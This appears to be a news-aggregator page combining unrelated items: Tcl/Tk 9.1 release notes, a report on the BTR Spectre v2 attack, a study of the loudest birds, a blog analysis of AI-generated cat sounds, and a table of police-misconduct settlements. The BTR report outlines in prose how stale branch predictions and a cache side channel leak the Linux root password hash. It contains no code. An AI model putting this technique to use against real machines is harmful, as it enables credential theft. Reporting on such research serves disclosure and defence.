Highlights of Tk 9.1

  • Accessibility screen reader support.
  • Initial support for bidirectional text / RTL languages.
  • New widget ttk::toggleswitch .
  • New command tk attribtable .
  • send command revised and improved on Aqua.
  • Handling of negative screen distances.
  • Extended states in ttk::treeview and ttk::notebook
  • Improvements to Tk_CanvasTextInfo
  • Rotated text on labels
  • Limit message box and dialogs to physical screen width.
  • Improved listbox selection colors.
  • Removed obsolete support for Windows XP appearances.

This is the main Tcl Developer Xchange site, www.tcl-lang.org . About this Site | [email protected]
Home | About Tcl/Tk | Software | Core Development | Community | Documentation

New Spectre v2 attack variant leaks Linux root password hash in minutes

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 13:10:11
A new Branch Target Reuse (BTR) attack has been devised that can recover root password hashes on Intel computers running Linux in 3-5 minutes on average. [...]...
Original Article

New Spectre v2 attack variant leaks Linux root password hash in minutes

A new Spectre v2 attack variant called Branch Target Reuse (BTR) can recover root password hashes from Intel computers running Linux in just a few minutes.

A BTR attack exploits stale information in a processor's branch predictor after a just-in-time (JIT) engine reuses memory for new code.

By manipulating this leftover information, an attacker can trick the processor into temporarily executing the wrong instructions and potentially expose sensitive data.

Researchers at VUsec (Systems and Network Security Group at VU Amsterdam) and Scuola Superiore Sant'Anna devised the new attack and evaluated how practical it is against Firefox's JavaScript engine SpiderMonkey, GraalVM, and the Linux kernel's cBPF.

VUSec’s Cristiano Guiffrida explained to BleepingComputer that this attack remains an important finding, considering that since 2018 the field assumed that these kinds of attacks were not practical due to self-modifying code (SMC) serving as the basis for dynamic code generation in commodity JIT engines.

BTR demonstrates the opposite, showing that SMC-based transient execution attacks are practical in real-world environments and can be used to leak the hash for the root password.

The researchers notified the affected vendors, and the issues received the identifiers CVE-2026-64507 and CVE-2026-64508. Fixes have already been merged into the Linux kernel.

BTR leaks root password hash

In the Spectre-v2 speculative execution side-channel attack, the CPU is tricked into briefly running instructions at a wrongly predicted jump destination, which can expose data through the CPU cache.

Its BTR variant does this by reusing an old prediction after the code at that destination has been replaced, the researchers explain in a technical paper.

The new attack exploits a gap between JIT-compiled code and the CPU’s branch predictor; specifically, when a JIT engine frees code and puts new code at the same address, the CPU may still remember an indirect branch target from the old code.

On a later branch, a point where the CPU decides which instruction to run next, it can briefly execute the new code from that stale target speculatively, even though normal execution would go elsewhere.

BTR attack overview
BTR attack overview
Source: VUSec

In their tests on Linux, the researchers used unprivileged classic BPF programs to train that prediction, free the original program, and place a different program in the reused memory.

The stale target led the CPU to execute attacker-crafted instructions at a misaligned offset, causing data access during speculative execution and generating a measurable cache trace that let the researchers infer the data byte by byte.

Next, they located a running ‘su’ process and recovered the root password hash from its memory at a rate of eight bytes per second.

“We evaluated the end-to-end exploit on both Raptor Cove and Lion Cove, and leaked the password within 3 and 5 minutes on average, respectively,” the researchers claim .

From a practical standpoint, leaking a password hash is not the same as retrieving the password in plaintext. However, an attacker can attempt to crack the hash offline or using cloud computing resources, with success depending on the hashing algorithm and the strength of the password.

The published technical paper demonstrates two end-to-end exploits against Linux cBPF: one at default configuration and one with the constant blinding hardening option enabled.

In the latter, the exploit is adapted to encode attacker-controlled instructions in jump offsets and still recover the hash within five minutes.

Exploit adapted to constant blinding hardening
Exploit adapted to constant blinding hardening
Source: VUSec

The researchers also examined Firefox’s SpiderMonkey and Oracle’s GraalVM as separate JIT engines for BTR exposure.

In SpiderMonkey, VUSec’s proof-of-concept showed that stale predictions survive code reuse, but not a complete browser exploit.

In GraalVM, the researchers identified a way to speculatively skip a sandbox check, but the engine’s activity cleared the predictions before they could complete an attack in their experiments.

Regarding the real-world image, the researchers note that most modern hardware is vulnerable to this new BTR attack.

“Indirect branch prediction is inherent to modern CPUs, and BTR exploits the desynchronization between the branch predictor and the actual state of the code,” explained VUSec.

“No current CPU has a mechanism to keep the two in sync, so until vendors add one, your CPU is vulnerable.”

“We confirmed this behavior on every CPU we tested, covering Intel, AMD and Arm.”

Users are recommended to apply OS and firmware updates, and Linux users are advised to upgrade to the latest kernel version.

Previous VUsec research on speculative execution and CPU microarchitectural attacks includes RIDL , BHI , SLAM , and other attacks targeting modern processors.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Dots: Always-on agents

Hacker News
openai.com
2026-09-29 13:07:57
Comments...

DevDay 2026 Recap

Hacker News
openai.com
2026-09-29 13:07:45
Comments...

GPT 6.1 Sol

Hacker News
openai.com
2026-09-29 13:06:45
Comments...

Two New Birds Louder Than Jackhammers Just Dropped

403 Media
www.404media.co
2026-09-29 13:04:37
The bare-throated bellbird and the red-legged seriema join the white bellbird in the winner’s circle of the loudest birds on Earth, with calls exceeding 120 decibels—louder than a chainsaw or jackhammer....
Original Article

Scientists have identified two new contenders for the world’s loudest bird—the bare-throated bellbird and the red-legged seriema—both of which can exceed 120 decibels, which is louder than a jackhammer, according to a study published on Tuesday in Evolution .

These two bird species are now in the same league as the white bellbird, which shattered the record for loudest bird in 2019 after its bizarre call was first measured and reported by Jeff Podos, a professor in the department of biology at the University of Massachusetts Amherst. It’s worth taking a moment to listen to the bellbird’s otherworldly call, which the males unleash over their remote habitat in the northern Amazon rainforest.

In the new study, Podos and former UMass Amherst graduate student João C.T. Menezes report that the bare-throated bellbird and the red-legged seriema occupy the same decibel range as the white bellbird. It's tough to declare a clear winner among the three birds due to differences in measurement techniques and individual variations within each species.

Regardless, this trio is a special class that is much louder than the fourth runner-up, the screaming piha, which tops out around 116 decibels. In addition to identifying the ear-splitting avians, the team captured unprecedented measurements of vocal amplitude in 123 bird species, an effort that represents “a step forward in uncovering what enables birds to produce the loudest acoustic signals of all terrestrial fauna,” according to the study.

“We were interested in a pretty basic question that's still out there because we know so little about amplitude,” said Menezes in a call with 404 Media. “We were basically interested in finding out why some species sing louder than others. For that, the more diverse the sample, the better.”

“We wanted to know the softest species we could get, and the loudest species we could get, and everything in between,” he continued. “The more variation, the better for answering this type of question. Of course, along the way, we found the two new contenders for loudest species, and that's super cool. But every species in the sample has their value for us to answer the actual question.”

Given the remarkable diversity of avian calls, it is no surprise that birdsong is one of the most well-researched topics in behavioral ecology. But unlike call features like tempo or frequency, vocal amplitude has been notoriously difficult to measure in the wild because it is dependent on distance to the animal, which can be tough to figure out in remote field environments, such as the Amazon rainforest.

Menezes and Podos were able to overcome this longstanding hurdle with the same laser rangefinders used by golfers to gauge the distance to holes.

“The laser rangefinders help us determine the distance between the recorder and the bird, which is important in our report as it allows us to correct our recordings of amplitude for distance,” Podos told 404 Media in an email. “But the actual recordings and thus readings of amplitude are made with another kind of device, a Sound Level Meter (normally used in industrial acoustics, but that can also serve in working with animals!).”

Using this new approach, the researchers were able to record the first clear amplitude measurements for dozens of species, from hummingbirds at the low end of the decibel range to the three loudest belters.

“I've been a bird watcher since childhood, so it was just adding another layer to bird-watching.” Menezes said. “And since amplitude is known for so few species, we could basically go anywhere and we could have like a new amplitude for a new species, even from my window here in São Paulo, or Jeff's backyard” in Massachusetts.

When they began their field research, Menezes and Podos predicted that the loudest birds in their measurements would have bigger bodies and wider beak openings, which proved true in the most deafening birds. But they were surprised to discover that there was no clear link between extreme loudness and ecological factors, like habitat or sexual behavior.

🌘

Subscribe to 404 Media to get The Abstract , our newsletter about the most exciting and mind-boggling science news and studies of the week.

The two bellbird species live in dense forest and are highly polygamous, so only the male bellbirds make loud calls to attract females. In contrast, the red-legged seriema lives in open habitats, including pastures, and forms long-term monogamous pair bonds.

“If you look at the top three birds, we can see perfect counterexamples for each of those factors,” Menezes said. “That was definitely a surprise—those parallel routes to extreme loudness.”

Menezes plans to keep delving into the particular ecological factors that lead to high vocal amplitudes in his future research. While he thinks that other birds may be capable of calls over 120 decibels, it would be unexpected to find even louder birds, as that volume seems to be an upper limit across terrestrial animals.

“There does seem to be a ceiling with terrestrial animals about the 120 to 125 [decibel] mark,” Menezes said. “Elephants can't go beyond that. There are really loud bats that use vocalization for echolocation, and they also don't go beyond that.”

“Based on that, my hunch is that we're not going to find a much louder bird, but I do think we'll find others that fall in that same category,” he concluded.

Text-to-meowdio models

Lobsters
www.kmjn.org
2026-09-29 12:51:35
Comments...
Original Article

an orange cat sitting in a wicker bed

Unimpressed by AI

Text-to-audio models take a text prompt as input, and generate audio as output. In principle they take any kind of prompt and generate any type of audio. If you re-prompt them with the same prompt but a different random seed, you should get a new example of audio for that prompt. But as you might imagine, any given text-to-audio model is probably not equally good at all kinds of audio: nature sounds, animal vocalizations, human vocalizations, music, etc. Furthermore, the range of output is wider in some cases than others: a given model may be able to produce a wide range of thunderclaps but have a relatively narrow range of bird chirps, or vice versa.

Generative range analysis

Some collaborators and I proposed a methodology for exploratory data analysis particularly focused on the generative range of text-to-audio models, which we don't think has been studied in much detail:

The main visualization tool we use, an expressive-range plot , comes from the procedural content generation (PCG) community, which uses it to analyze the range of level generators and similar kinds of PCG systems that may be either AI-driven or handcrafted generators (examples here and here ). This post applies the methodology to the rather expressive special case of cat vocalizations. Unlike in the PDF paper, you can also click on the dots in the plots and listen to the generated audio. Advice: Use headphones if you live with a cat!

For this post, I generated 2,100 clips of cats vocalizing, with seven different prompts, three text-to-audio models, and 100 samples per prompt+model combination. The models are intended to illustrate some of the range of current model architectures and training sets:

  • Stable Audio Open 1.0 : Continuous latent diffusion trained on ~486k open-license clips from Freesound and the Free Music Archive (FMA), conditioned via T5-base.
  • EzAudio : 1D waveform VAE + DiT trained on AudioSet and VGGSound with synthetic captions, followed by supervised fine-tuning on AudioCaps.
  • TangoFlux : Flow-matching transformer pre-trained on WavCaps (~400k clips), fine-tuned on AudioCaps, and aligned using direct preference optimization (DPO) on synthetic CLAP-ranked preference pairs.

In typical expressive range analysis, you choose domain-specific metrics for the axes. To compare outputs more generally without hand-crafted metrics for each prompt, in the paper we used three standard audio attributes: timbre, pitch, and loudness. For each clip, we computed a feature vector of timbre/pitch/loudness through the clip, as well as the 1st- and 2nd-order differences (to capture variation over time). Then we reduced each to two dimensions with principal components analysis (PCA) to plot it. This means the axes are not directly interpretable as acoustic properties, but distance and point clustering is meaningful (nearby points share similar acoustic profiles). For this post, I ran one PCA reduction for all 2,100 clips, so points are comparable between plots.

Prompt: "sound of cat"

In the paper, we started with the prompt "sound of [x]" for various objects [x] , to see what each model would produce without being given an explicit verb. So in this post I'll also start with "sound of cat" .

Toggle between Timbre, Pitch, and Loudness to see the point-cloud spreads on each acoustic property. Click a point to listen.

DRAG TO PAN · SCROLL TO ZOOM · DBLCLICK RESET

Observations: Stable Audio Open and TangoFlux both generally produce meowing, as one might expect. TangoFlux's meows are a bit more tightly clustered in the expressive-range diagrams (and to my ears also sound like they vary less). EzAudio surprisingly often just has silence or living-room background noise, or a single faint meow in the whole 10 seconds; I believe this is probably due to being trained on uncurated video captions, where cats often appear silently. The fact that EzAudio is an outlier is particularly visible on the Loudness plot.

Object and action in the prompt

We can try a few prompts to see how models respond to being more or less specific about the desired object and action.

  1. Bare noun: "cat"
  2. Paper baseline: "sound of cat"
  3. Explicit action: "sound of a cat meowing"

That produces 900 total samples (3 prompts x 3 models x 100 samples each). In the visualization below you can check or uncheck each of the three prompts and three models to see subsets.

DRAG TO PAN · SCROLL TO ZOOM · DBLCLICK RESET

Observations: As in the previous plot, EzAudio often doesn't produce a meow with the "cat" or "sound of cat" prompts, but does start doing so (most of the time) when we explicitly say we want the cat to be meowing. TangoFlux and Stable Audio Open tend to produce meows for all three prompts, but it's interesting that the timbre range significantly narrows when we specify meowing. (To see that, try selecting just one model and the 1st and 3rd prompts.)

Descriptive modifiers

Something the paper left for future work was investigating how descriptive modifiers impact expressive ranges. For this post I'll try four different prompts that try to elicit qualitatively different types of cat vocalizations (some of them not meows):

  • "tiny kitten meowing"
  • "angry cat hissing and growling"
  • "cat meowing plaintively"
  • "happy cat purring"

In addition to the dots for individual clips (as above), the plot below draws an arrow from the centroid for the baseline "sound of cat" clips to each of the other four prompts' centroids, showing how each prompt shifts the model's output distribution. Select a model to compare how it responds here, and click any centroid badge to listen to the clip nearest to the centroid.

DRAG TO PAN · SCROLL TO ZOOM · DBLCLICK RESET

Observations: Well, there is a lot going on here. Toggling between models shows they respond differently to the modifiers. On timbre, TangoFlux has particularly large centroid shifts (especially for "tiny kitten meowing" ). On loudness, we can see again that EzAudio needs actions specified to produce noticeable audio, so essentially any modifier pushes in a similar direction. The Pitch view shows fairly strong directional agreement in the effect of each modifier between TangoFlux and Stable Audio.

Listening to a few examples is also a good reminder that looking at the distribution of purely acoustic features like these doesn't measure quality , which would need different metrics. Some of the hisses in particular seem to blow out into something more like tape hiss, either due to semantic mix-up or some kind of audio artifact. A lot of the purrs are also pretty weird sounding.

Cross-model agreement: What does "plaintive" mean?

To plot that differently, let's look at just one of the modified prompts, but with all the models. The plot below shows "sound of cat" and "cat meowing plaintively" along with the shift in centroids from the former to the latter prompt for all three models. I picked "cat meowing plaintively" to look at in more detail because, subjectively, all three models actually do fairly good interpretations of it, unlike some of the artifacts in the hissing and purring prompts, so we can look for more subtle distinctions.

DRAG TO PAN · SCROLL TO ZOOM · DBLCLICK RESET

Observations: There are a few things we might look for here. If there were some kind of consistent, direct acoustic meaning of "plaintive" as a modifier, we might expect to see the arrows be parallel to each other, as in some of the classic word2vec examples (although admittedly those examples are in embedding space, while we're in a projected acoustic space). That clearly does not seem to be the case. We can also look at the actual centroid locations and spreads of points, where there does seem to be something interesting going on. In timbre space, asking for a plaintive meow vs. a generic sound of cat seems to actually push the models further apart; but in pitch space they converge to more similar generative output.

Full Meowdio Explorer

Below are all 2,100 clips generated for this post. Select any combination of models and prompts, switch between Timbre, Pitch, and Loudness plots, and toggle whether points are colored by model or by prompt.

DRAG TO PAN · SCROLL TO ZOOM · DBLCLICK RESET

There are all kinds of metrics for text-to-audio generators: Fréchet audio distance (FAD), CLAP score, etc. But there's no substitute for just listening to the output. We think slicing and dicing the generative space with these kinds of expressive-range plots is one way to get an ear on what's going on.

Select any dot above to play

Audio preview

0:00 0:00

Captain ACAB - collectively tracking the hidden costs of law enforcement

Lobsters
captainacab.com
2026-09-29 12:30:03
Comments...
Original Article

Captain ACAB

Captain ACAB Collectively tracking the hidden costs of law enforcement

What is this?

Every day in the United States, people from all walks of life are at the mercy of the fallibility of law enforcement officers. There are hundreds of reported cases of wrongful deaths, civil rights violations, excessive force, and other lapses in judgement, training, and oversight. These incidents often lead to settlements paid by taxpayers. Captain ACAB is a volunteer, open-source effort to track these settlements and shed light on the financial impact of law enforcement misconduct.

Where is this from?

This data is pulled by volunteers from official civic minutes documents. Captain ACAB 's goal is to provide transparency with citations, always referencing the public record. This is a community effort!

Captain ACAB will be updated every Sunday, unless we say otherwise.

How can I help? / Inquiries

In California, SB 1013 is the most promising bill on police accountability for surveillance. Reach out to your Assemblymember and State Senator and let them know you want this passed.

If you'd like to write about us, we'd love to chat, reach out to press@captainacab.com . All other inquiries can go to info@captainacab.com .

This list is not exhaustive. We update every week. Last updated Mon Sep 28 17:41:49 2026, Pacific

Filter by...

All cases from:

  • 2026 (4 cases, $44,525,000.00 in settlements)
  • 2025 (6 cases, $4,565,000.00 in settlements)
  • 2024 (52 cases, $103,260,000.00 in settlements)
  • 2023 (35 cases, $31,821,835.79 in settlements)
  • 2022 (34 cases, $82,339,000.00 in settlements)
  • 2021 (10 cases, $6,120,000.00 in settlements)
  • 2020 (21 cases, $15,094,206.74 in settlements)
  • 2019 (20 cases, $46,075,000.00 in settlements)
  • 2018 (18 cases, $28,199,409.00 in settlements)
  • 2017 (14 cases, $17,055,000.00 in settlements)
  • 2016 (29 cases, $20,728,248.00 in settlements)
  • 2015 (17 cases, $36,139,000.00 in settlements)
  • 2014 (8 cases, $3,369,636.00 in settlements)
  • 2013 (13 cases, $4,584,000.00 in settlements)
  • 2012 (10 cases, $3,892,000.00 in settlements)
  • 2011 (4 cases, $2,522,000.00 in settlements)
  • 2010 (8 cases, $1,946,000.00 in settlements)
  • 2009 (4 cases, $248,750.00 in settlements)
  • 2006 (3 cases, $3,250,000.00 in settlements)
  • 2005 (3 cases, $1,337,500.00 in settlements)
  • 2004 (16 cases, $1,158,400.00 in settlements)
  • 2003 (5 cases, $62,650.00 in settlements)
  • 2002 (2 cases, $30,250.00 in settlements)
  • 2000 (3 cases, $104,250.00 in settlements)
  • 1999 (3 cases, $30,885.60 in settlements)
  • 1998 (7 cases, $127,500.00 in settlements)
  • 1996 (2 cases, $40,000.00 in settlements)
  • 1994 (4 cases, $1,563,000.00 in settlements)

All cases from:

  • CA (294 cases, $417,226,529.79 in settlements)
  • IL (48 cases, $23,012,884.60 in settlements)
  • MI (1 cases, $8,250,000.00 in settlements)
  • RI (5 cases, $2,012,706.74 in settlements)
  • NC (2 cases, $2,031,750.00 in settlements)
  • WI (1 cases, $7,500,000.00 in settlements)
  • TN (1 cases, $150,000.00 in settlements)
  • TX (3 cases, $4,650.00 in settlements)

All cases

(355 cases, $460,188,521.13 in settlements)

Compensation Date Approved Municipality State Reason
$8,150,000.00 2026-05-19 Orange County CA Wrongful death
$36,000,000.00 2026-05-12 Alameda County CA Wrongful death
$75,000.00 2026-03-24 Alameda County CA False imprisonment
$300,000.00 2026-01-27 San Joaquin County CA Grooming; emotional distress; civil rights violations
$75,000.00 2025-10-28 Alameda County CA Excessive force
$200,000.00 2025-09-09 Orange County CA Death while in custody
$90,000.00 2025-05-06 Orange County CA Automobile accident
$1,850,000.00 2025-04-08 San Joaquin County CA Assault; sexual battery
$850,000.00 2025-02-25 San Joaquin County CA Civil rights violations; assault and battery
$1,500,000.00 2025-02-25 San Joaquin County CA Excessive force; civil rights violations; assault and battery
$7,500,000.00 2024-12-17 Los Angeles County CA Minor abuse, sexual harassment, emotional distress
$500,000.00 2024-12-03 Los Angeles County CA Wrongful death; denial of medical care; false arrest; unlawful detention
$525,000.00 2024-12-03 Los Angeles County CA Excessive force
$95,000.00 2024-12-03 Orange County CA Excessive force
$95,000.00 2024-12-03 Orange County CA Excessive force
$400,000.00 2024-12-03 Los Angeles County CA Excessive force; civil rights violations
$250,000.00 2024-12-03 Los Angeles County CA Excessive force; civil rights violations
$975,000.00 2024-11-26 Los Angeles County CA Wrongful death; excessive force
$275,000.00 2024-11-26 Los Angeles County CA Wrongful death; civil rights violations
$495,000.00 2024-11-26 Los Angeles County CA Traffic collision
$200,000.00 2024-11-05 San Francisco CA Civil rights violations
$75,000.00 2024-11-05 Orange County CA Sexual Harassment
$45,000.00 2024-11-05 Orange County CA Automobile accident
$600,000.00 2024-10-08 Los Angeles County CA Automobile accident
$7,000,000.00 2024-09-10 Los Angeles County CA Excessive force
$125,000.00 2024-09-10 Orange County CA False arrest; excessive force; civil rights violations
$1,050,000.00 2024-08-27 Orange County CA Unlawful search and seizure; unlawful detention and arrest; battery; negligence
$5,250,000.00 2024-08-06 Los Angeles County CA Wrongful death
$115,000.00 2024-08-05 Los Angeles County CA Automobile accident
$60,000.00 2024-07-30 Oakland CA False arrest; excessive force
$1,400,000.00 2024-07-23 Los Angeles County CA Automobile accident
$2,350,000.00 2024-07-16 Walnut Creek CA Automobile accident
$500,000.00 2024-07-09 San Francisco CA Civil rights violations
$350,000.00 2024-06-11 San Jose CA Excessive force; civil rights violations
$2,250,000.00 2024-05-21 San Joaquin County CA Excessive force; medical negligence
$850,000.00 2024-05-21 San Joaquin County CA Civil rights violations; negligence
$87,500.00 2024-05-21 Orange County CA Unlawful detainment; excessive force
$3,375,000.00 2024-05-07 Los Angeles County CA Wrongful death
$250,000.00 2024-05-07 Los Angeles County CA Wrongful death
$24,000,000.00 2024-05-07 Los Angeles County CA Wrongful conviction
$150,000.00 2024-04-23 Orange County CA Civil rights violations
$800,000.00 2024-04-23 Orange County CA Wrongful death; civil rights violations; excessive force
$150,000.00 2024-04-23 Orange County CA Civil rights violations; medical neglect
$50,000.00 2024-04-16 San Francisco CA Civil rights violations
$75,000.00 2024-04-16 San Francisco CA Civil rights violations
$25,000,000.00 2024-04-09 Los Angeles County CA Wrongful death; civil rights violations; excessive force
$185,000.00 2024-04-09 Los Angeles County CA Automobile accident
$150,000.00 2024-04-09 Orange County CA Excessive force; civil rights violations
$750,000.00 2024-03-26 San Joaquin County CA Wrongful death; battery
$275,000.00 2024-03-26 San Joaquin County CA Excessive force
$275,000.00 2024-02-27 Los Angeles County CA Wrongful death; civil rights violations
$60,000.00 2024-02-27 San Joaquin County CA Civil rights violations; unlawful search and seizure
$250,000.00 2024-02-06 Los Angeles County CA Excessive force
$350,000.00 2024-02-06 Los Angeles County CA Automobile accident
$300,000.00 2024-02-06 Los Angeles County CA Unlawful arrest; excessive force
$800,000.00 2024-02-06 Los Angeles County CA Automobile accident
$160,000.00 2024-02-06 Los Angeles County CA Dispute over production of records
$2,250,000.00 2024-02-06 Los Angeles County CA Automobile accident
$1,750,000.00 2024-01-09 Los Angeles County CA Personal injuries
$775,000.00 2024-01-09 Los Angeles County CA Automobile accident
$7,000,000.00 2023-11-14 Alameda County CA Wrongful death; medical negligence
$700,000.00 2023-11-07 Los Angeles County CA False arrest; assault
$400,000.00 2023-10-23 Los Angeles County CA Wrongful death; civil rights violations
$175,000.00 2023-10-23 Los Angeles County CA Automobile accident
$750,000.00 2023-10-17 Los Angeles County CA Automobile accident
$700,000.00 2023-10-17 Los Angeles County CA Wrongful death; civil rights violations
$465,000.00 2023-10-17 San Francisco CA Automobile accident
$650,000.00 2023-10-17 Los Angeles County CA Automobile accident
$200,000.00 2023-10-17 Los Angeles County CA Automobile accident
$450,000.00 2023-10-03 Oakland CA Wrongful death
$50,000.00 2023-10-03 San Francisco CA Automobile accident
$975,000.00 2023-09-12 San Joaquin County CA Dog bite
$3,350,000.00 2023-09-12 San Jose CA Civil rights violations; assault and battery
$400,000.00 2023-07-18 Oakland CA Excessive force
$400,000.00 2023-07-18 Oakland CA Excessive force
$575,000.00 2023-07-11 Los Angeles County CA Sexual assault
$1,300,000.00 2023-06-13 Alameda County CA Wrongful death; medical negligence
$69,999.00 2023-06-07 San Francisco CA Civil rights violations
$750,000.00 2023-06-06 Los Angeles County CA Automobile accident
$400,000.00 2023-05-16 Los Angeles County CA Wrongful death
$200,000.00 2023-05-09 San Francisco CA Assault; sexual battery
$125,000.00 2023-05-02 Los Angeles County CA Automobile accident
$200,000.00 2023-05-02 Los Angeles County CA Wrongful death
$300,000.00 2023-04-18 Alameda County CA Civil rights violations; medical neglect
$1,700,000.00 2023-04-04 Los Angeles County CA Automobile accident
$675,000.00 2023-04-04 Los Angeles County CA Wrongful death; civil rights violations
$150,000.00 2023-04-04 Los Angeles County CA Automobile accident
$200,000.00 2023-03-21 Los Angeles County CA Automobile accident
$235,000.00 2023-03-07 Los Angeles County CA Automobile accident
$750,000.00 2023-02-28 Los Angeles County CA Wrongful death
$1,200,000.00 2023-02-28 Los Angeles County CA Wrongful conviction
$426,836.79 2023-02-07 Los Angeles County CA Failure to produce documentation
$2,500,000.00 2023-02-07 Los Angeles County CA Wrongful death; civil rights violations
$2,900,000.00 2023-01-24 Los Angeles County CA Excessive force; civil rights violations; unlawful search
$500,000.00 2023-01-17 Benicia CA Wrongful death; automobile accident
$850,000.00 2022-12-06 Los Angeles County CA Wrongful death
$400,000.00 2022-12-06 Los Angeles County CA Wrongful death; civil rights violations
$160,000.00 2022-11-08 San Francisco CA Civil rights violations; excessive force
$100,000.00 2022-11-08 San Francisco CA Civil rights violations
$1,900,000.00 2022-11-01 Los Angeles County CA Wrongful death; civil rights violations; denial of medical care
$8,000,000.00 2022-11-01 Los Angeles County CA Wrongful death
$5,000,000.00 2022-11-01 Los Angeles County CA Wrongful death; civil rights violations
$16,250,000.00 2022-11-01 Los Angeles County CA Wrongful death
$16,500,000.00 2022-11-01 Los Angeles County CA Excessive force; civil rights violations
$155,000.00 2022-09-20 Alameda County CA Civil rights violations
$160,000.00 2022-08-30 Los Angeles County CA Automobile accident
$480,000.00 2022-08-23 Orange County CA Civil rights violations
$200,000.00 2022-08-09 Los Angeles County CA Personal injuries; deliberate indifference
$300,000.00 2022-08-09 Los Angeles County CA Personal injuries; deliberate indifference
$150,000.00 2022-07-26 Los Angeles County CA False arrest; civil rights violations
$700,000.00 2022-07-26 Los Angeles County CA Automobile accident
$145,000.00 2022-07-19 Orange County CA Automobile accident
$400,000.00 2022-07-06 Los Angeles County CA Wrongful death; civil rights violations
$875,000.00 2022-06-14 Los Angeles County CA Wrongful death; civil rights violations
$2,750,000.00 2022-06-14 Los Angeles County CA Wrongful death; civil rights violations; excessive force
$150,000.00 2022-06-14 Los Angeles County CA Injuries; property damage
$1,500,000.00 2022-06-14 San Francisco CA Civil rights violations
$625,000.00 2022-05-17 Los Angeles County CA Medical neglect
$250,000.00 2022-05-10 Orange County CA Excessive force; civil rights violations
$250,000.00 2022-05-10 Orange County CA Excessive Force;
$500,000.00 2022-05-10 Orange County CA Civil rights violations; indifference after suffering
$1,250,000.00 2022-05-03 Los Angeles County CA Wrongful death
$6,500,000.00 2022-04-19 Los Angeles County CA Death due to automobile accident
$2,900,000.00 2022-04-19 San Joaquin County CA Wrongful death; automobile accident
$199,000.00 2022-03-15 Los Angeles County CA Wrongful death; deliberate indifference to medical needs
$3,840,000.00 2022-03-15 Los Angeles County CA Wrongful death; excessive force
$150,000.00 2022-03-08 Orange County CA Excessive force; civil rights violations
$500,000.00 2022-02-08 Orange County CA Civil rights violations
$1,500,000.00 2021-11-02 Los Angeles County CA Wrongful death; civil rights violations
$190,000.00 2021-11-02 Los Angeles County CA False arrest; civil rights violations; excessive force; denied medical treatment
$650,000.00 2021-11-02 Orange County CA Wrongful death
$190,000.00 2021-10-26 San Francisco CA Unlawful detention; unlawful arrest
$525,000.00 2021-10-05 Los Angeles County CA False arrest; civil rights violations; falsified police report
$60,000.00 2021-06-22 San Francisco CA Excessive force; civil rights violations
$175,000.00 2021-06-09 Los Angeles County CA Wrongful detainment
$2,000,000.00 2021-06-08 Los Angeles County CA Wrongful death; civil rights violations; excessive force
$230,000.00 2021-06-08 Los Angeles County CA Wrongful death
$600,000.00 2021-02-09 Los Angeles County CA Wrongful death
$825,000.00 2020-12-08 Los Angeles County CA Wrongful death; civil rights violations
$30,000.00 2020-12-08 San Francisco CA Excessive force; illegal search
$3,900,000.00 2020-11-10 Los Angeles County CA Wrongful death
$925,000.00 2020-09-15 Los Angeles County CA Wrongful death
$275,000.00 2020-08-18 San Francisco CA Excessive force; neglect; civil rights violations
$180,000.00 2020-08-18 San Francisco CA Unreasonable seizure; excessive force; civil rights violations
$49,000.00 2020-08-18 San Francisco CA Failure to produce documentation
$150,000.00 2020-08-18 San Francisco CA Civil rights violations
$400,000.00 2020-07-21 Los Angeles County CA Wrongful death; civil rights violations
$147,500.00 2020-06-30 Oakland CA Wrongful arrest; civil rights violations
$1,300,000.00 2020-05-12 Los Angeles County CA Wrongful death; civil rights violations
$1,400,000.00 2020-05-12 Oakland CA Wrongful death; excessive force
$1,025,000.00 2020-03-31 Los Angeles County CA Wrongful death; civil rights violations
$250,000.00 2020-02-04 Oakland CA Wrongful death; excessive force
$225,000.00 2020-02-04 San Francisco CA Civil rights violations
$250,000.00 2019-11-05 Oakland CA Excessive force
$250,000.00 2019-10-24 Oakland CA Excessive force
$75,000.00 2019-10-08 San Joaquin County CA False imprisonment; excessive force
$3,000,000.00 2019-09-17 Los Angeles County CA Wrongful death; assault and battery
$1,300,000.00 2019-07-09 Los Angeles County CA Wrongful death; civil rights violations
$650,000.00 2019-06-18 Los Angeles County CA Wrongful death
$7,000,000.00 2019-06-18 Los Angeles County CA Wrongful death; civil rights violations
$3,750,000.00 2019-05-14 Los Angeles County CA Wrongful death; excessive force
$300,000.00 2019-04-23 San Joaquin County CA Wrongful death; negligence
$600,000.00 2019-04-16 Los Angeles County CA Wrongful death; civil rights violations
$13,100,000.00 2019-04-02 San Francisco CA Unlawful prosecution; false imprisonment
$1,250,000.00 2019-03-12 Los Angeles County CA Wrongful death; excessive force
$4,600,000.00 2019-03-05 Los Angeles County CA Wrongful death; negligence
$45,000.00 2019-03-05 San Francisco CA Civil rights violations
$150,000.00 2019-02-19 Los Angeles County CA False arrest; battery
$950,000.00 2019-02-12 Los Angeles County CA Sexual assault
$225,000.00 2019-02-12 Los Angeles County CA Automobile accident
$595,000.00 2019-01-29 San Diego County CA Wrongful death
$485,000.00 2019-01-08 Los Angeles County CA Wrongful death; civil rights violations; negligence
$60,000.00 2018-12-11 Oakland CA Excessive force
$14,350,000.00 2018-10-16 Los Angeles County CA Wrongful death; excessive force
$225,000.00 2018-10-16 Los Angeles County CA Excessive force; battery
$400,000.00 2018-10-02 Los Angeles County CA False arrest; civil rights violations
$119,909.00 2018-07-31 San Francisco CA Excessive force; civil rights violations
$50,000.00 2018-07-24 Oakland CA False arrest
$1,750,000.00 2018-06-12 Los Angeles County CA Wrongful death; excessive force
$690,000.00 2018-05-29 Los Angeles County CA Wrongful death
$1,750,000.00 2018-05-08 Los Angeles County CA Wrongful death; civil rights violations
$200,000.00 2018-05-08 Los Angeles County CA Automobile accident
$650,000.00 2018-05-08 Los Angeles County CA Wrongful death
$200,000.00 2018-05-08 Los Angeles County CA False arrest
$100,000.00 2018-05-01 San Francisco CA Wrongful death
$2,700,000.00 2018-03-13 Los Angeles County CA Wrongful death; civil rights violations
$1,000,000.00 2018-01-30 Los Angeles County CA Wrongful death; civil rights violations
$200,000.00 2018-01-30 Los Angeles County CA Excessive force; civil rights violations
$50,000.00 2017-10-24 San Francisco CA Civil rights violations
$4,000,000.00 2017-10-03 Los Angeles County CA Wrongful death; automobile accident
$75,000.00 2017-09-19 San Francisco CA Civil rights violations; arrest; battery
